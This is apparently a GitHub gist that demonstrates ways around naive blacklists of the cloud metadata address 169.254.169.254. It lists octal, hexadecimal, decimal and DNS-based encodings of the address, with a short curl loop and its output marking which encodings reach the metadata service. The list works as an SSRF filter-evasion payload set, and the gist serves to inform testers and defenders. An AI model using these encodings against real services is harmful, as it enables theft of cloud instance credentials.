Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. See https://twitter.com/coffeetocode/status/912788650408026112
$ ./try_local_metadata.sh
Trying 169.254.169.254... found metadata
Trying 169.254.43518... -
Trying 169.1668966... -
Trying 2852039166... found metadata
Trying 0251.0376.0251.0376... found metadata
Trying 0251.0376.0124776... -
Trying 251.0775248... -
Trying 25177524776... -
Trying 0xa9.0xfe.0xa9.0xfe... found metadata
Trying 0xa9.0xfe.0xa9fe... found metadata
Trying 0xa9.0xfea9fe... found metadata
Trying 0xa9fea9fe... found metadata
Trying metadata.nicob.net... found metadata
Trying 1ynrnhl.xip.io... found metadata
Trying 169.254.169.254.xip.io... found metadata
Trying foo.1ynrnhl.xip.io... found metadata
Trying 425.510.425.510... -
Trying 7147006462... -
Trying 0xA9.0xFE.0xA9.0xFE... found metadata
Trying 0xA9FEA9FE... found metadata
Trying 0x41414141A9FEA9FE... -
Trying 0251.0376.0251.0376... found metadata
Trying 0251.00376.000251.0000376... found metadata
Trying [::1698.254.169.254]... -
Trying instance-data... found metadata
169.254.169.254
169.254.43518
169.1668966
2852039166
0251.0376.0251.0376
0251.0376.0124776
251.0775248
25177524776
0xa9.0xfe.0xa9.0xfe
0xa9.0xfe.0xa9fe
0xa9.0xfea9fe
0xa9fea9fe
metadata.nicob.net
1ynrnhl.xip.io
169.254.169.254.xip.io
foo.1ynrnhl.xip.io
425.510.425.510
7147006462
0xA9.0xFE.0xA9.0xFE
0xA9FEA9FE
0x41414141A9FEA9FE
0251.0376.0251.0376
0251.00376.000251.0000376
[::1698.254.169.254]
instance-data
# run on an instance of course...
while read p; do
printf "Trying %-30s " $p...
if curl -s "http://$p/" | grep --silent latest; then
echo found metadata;
else
echo -;
fi
done <local_metadata_synonyms.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.